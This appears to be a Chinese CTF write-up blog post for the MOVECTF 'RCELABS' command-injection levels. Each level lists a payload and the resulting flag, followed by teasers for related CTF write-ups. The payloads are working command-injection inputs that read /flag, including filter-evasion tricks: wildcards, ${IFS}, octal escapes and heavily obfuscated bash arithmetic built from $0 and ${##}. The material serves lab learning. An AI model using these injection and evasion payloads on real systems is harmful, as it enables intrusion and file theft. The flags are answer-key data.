MOVECTF-WP
RCELABS-0
flag{3s2wvash-ps8i-42r-8idu-29lukzyaulna}
RCELABS-1
a=system("tac /flag"); |
flag{jrifs3wu-dsqq-4hr-8pmw-lojok3hevw9a}
RCELABS-2
GET:action=submit |
flag{qicmdfa6-qphh-4rz-8dze-uyq1k5icrha5}
RCELABS-3
a=cat /flag |
flag{x88vasgf-jsvy-4ga-8mlb-wbot5g7mh20c}
RCELABS-4
ip=127.0.0.1;cat /flag |
flag{sy2wwv2g-fk61-47z-8pic-m2uof4pfi7ko}
RCELABS-5
cmd=cat /f* |
flag{pckbtoa8-nixs-4u8-8wry-u6uhcdge6l76}
RCELABS-6
cmd=/???/????64 /??a? |
flag{01jdj0do-ietg-4xv-8sdo-muicwrnwc4f0}
RCELABS-7
cmd=cat${IFS}/f* |
flag{3j2evhll-s3fi-4qg-8kz3-u1cibu6ryw9f}
RCELABS-8
cmd=cat /f*;1 |
flag{ztstll1g-10zh-4uy-8w1t-0excqw9mjnad}
RCELABS-9
cmd=$'\143\141\164' $'\057\146\154\141\147' |
flag{cfq2rapl-4yfd-46z-8ph6-k51ni86icqx6}
RCELABS-10
cmd=%240%3C%3C%3C%240%5C%3C%5C%3C%5C%3C%5C%24%5C'%5C%5C%24((%24((1%3C%3C1))%2310001111))%5C%5C%24((%24((1%3C%3C1))%2310001101))%5C%5C%24((%24((1%3C%3C1))%2310100100))%5C%5C%24((%24((1%3C%3C1))%23101000))%5C%5C%24((%24((1%3C%3C1))%23111001))%5C%5C%24((%24((1%3C%3C1))%2310010010))%5C%5C%24((%24((1%3C%3C1))%2310011010))%5C%5C%24((%24((1%3C%3C1))%2310001101))%5C%5C%24((%24((1%3C%3C1))%2310010011))%5C' |
注意由于有#,要url编码一次
flag{q7cntwmd-y9ud-4b7-8ht7-4derkqneyiyq}
RCELABS-11
思路同上,用${##}来替换1
cmd=$0<<<$0\<\<\<\$\'\\$(($((${##}<<${##}))#${##}000${##}${##}${##}${##}))\\$(($((${##}<<${##}))#${##}000${##}${##}0${##}))\\$(($((${##}<<${##}))#${##}0${##}00${##}00))\\$(($((${##}<<${##}))#${##}0${##}000))\\$(($((${##}<<${##}))#${##}${##}${##}00${##}))\\$(($((${##}<<${##}))#${##}00${##}00${##}0))\\$(($((${##}<<${##}))#${##}00${##}${##}0${##}0))\\$(($((${##}<<${##}))#${##}000${##}${##}0${##}))\\$(($((${##}<<${##}))#${##}00${##}00${##}${##}))\' |
flag{dlgu8dkz-6eib-4ea-8uyg-yiyors5xzfaq}
RCELABS-12
思路同上,但是少了0
如果a=0,b=1,c=2,那么 ${!a} 就相当于 $0 , ${!b} 就相当于 $1 , ${!c} 就相当于 $2 |
${!#}<<<${!#}\<\<\<\$\'\\$(($((${##}<<${##}))#${##}${#}${#}${#}${##}${##}${##}${##}))\\$(($((${##}<<${##}))#${##}${#}${#}${#}${##}${##}${#}${##}))\\$(($((${##}<<${##}))#${##}${#}${##}${#}${#}${##}${#}${#}))\\$(($((${##}<<${##}))#${##}${#}${##}${#}${#}${#}))\\$(($((${##}<<${##}))#${##}${##}${##}${#}${#}${##}))\\$(($((${##}<<${##}))#${##}${#}${#}${##}${#}${#}${##}${#}))\\$(($((${##}<<${##}))#${##}${#}${#}${##}${##}${#}${##}${#}))\\$(($((${##}<<${##}))#${##}${#}${#}${#}${##}${##}${#}${##}))\\$(($((${##}<<${##}))#${##}${#}${#}${##}${#}${#}${##}${##}))\' |
flag{ytscxxhg-xs12-42w-8t6v-vqivwbuwrlzv}
本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来源 Yxing!
相关推荐
2025-06-07
CMCTF-WP
WEBpop<?phpclass A1{ public $a1;}class A2{ public $a2 = '10086';}class A3{ public $a3;}class A4{ public $a4;}$a=new A1();$a->a1=new A2();$a->a1->a2=new A3();$a->a1->a2->a3=new A4();echo...
2025-07-14
0xGame-WP
2024ez_login弱口令直接爆破即可,admin/admin123 0xGame{It_Is_Easy_Right?} ez_rcefrom flask import Flask, requestimport subprocessapp = Flask(__name__)@app.route("/")def index(): return open(__file__).read()@app.route("/calc", methods=['POST'])def calculator(): expression = request.form.get('expression') or "114 1000 * 514 + p" result = subprocess.run(["dc", "-e", expression], capture_output=True, text=True) ...
2025-04-26
ACTF-WP
WEBnot so web 1题目先随便注册登录进入后base64解码得到源码 import base64, json, timeimport os, sys, binasciifrom dataclasses import dataclass, asdictfrom typing import Dict, Tuplefrom secret import KEY, ADMIN_PASSWORDfrom Crypto.Cipher import AESfrom Crypto.Util.Padding import pad, unpadfrom flask import ( Flask, render_template, render_template_string, request, redirect, url_for, flash, session,)app = Flask(__name__)app.secret_key = KEY@dataclass(kw_only=True)class APPUser: name:...
2025-01-23
BaseCTF-WP
2024HTTP 是什么呀常规的GET,POST传参,改cookie,referer,UA,IP,注意这里如果是GET传参要传入%00,就要先url编码一次,即传入%2500,因为浏览器会自动进行一次url解码 GET /?basectf=we1c%2500me POST Base=fl@gCookie: c00k13=i can't eat itUser-Agent: BaseReferer: BaseX-Forwarded-For:127.0.0.1 base64解码即可 喵喵喵´•ﻌ•`直接GET传参 DT=system('ls /');DT=system('cat /flag'); md5绕过欸直接数组绕过即可,注意第二层为强比较,也可用数组绕过 GET:name[]=1&name2[]=2Post:password[]=3&password2[]=4 A Dark Room源码 upload写个一句话木马存为1.php上传,bp抓包修改文件类型为Content-Type:...
2025-05-15
CTBUCTF-WP
WEBWelcome !! ctbuctf{we1c0me_t0_CT9UC7F2025} Sql_No_map…?原先还在自己测,结果发现目录有东西…… //index.php<?phprequire 'lib.php';header("Content-Type: text/html; charset=utf-8");$err = '';$selected_id = $_GET['id'] ?? '';$selected_article = null;// 获取文章列表$list_sql = "SELECT id, title FROM article ORDER BY id ASC"; //升序排列$list_res = db()->query($list_sql);$articles = [];while ($row = $list_res->fetch_assoc()) { $articles[]...
2024-12-02
Hackergame复现
签到 错误输入一次后在url框中发现false,修改为true后获得flag 喜欢做签到的 CTFer 你们好呀题目要求ctf战队招新网站,在承办单位中找到,进去后为Linux终端 flag1通过help命令找出可用命令,再用ls -la命令找到隐藏的.flag文件,cat .flag获得 flag{0k_175_a_h1dd3n_s3c3rt_f14g___please_join_us_ustc_nebula_anD_two_maJor_requirements_aRe_shown_somewhere_else} flag2输出.oh-you-found-it的内容,提示考虑其他目录,进入Awards时提示要管理员权限,但是sudo...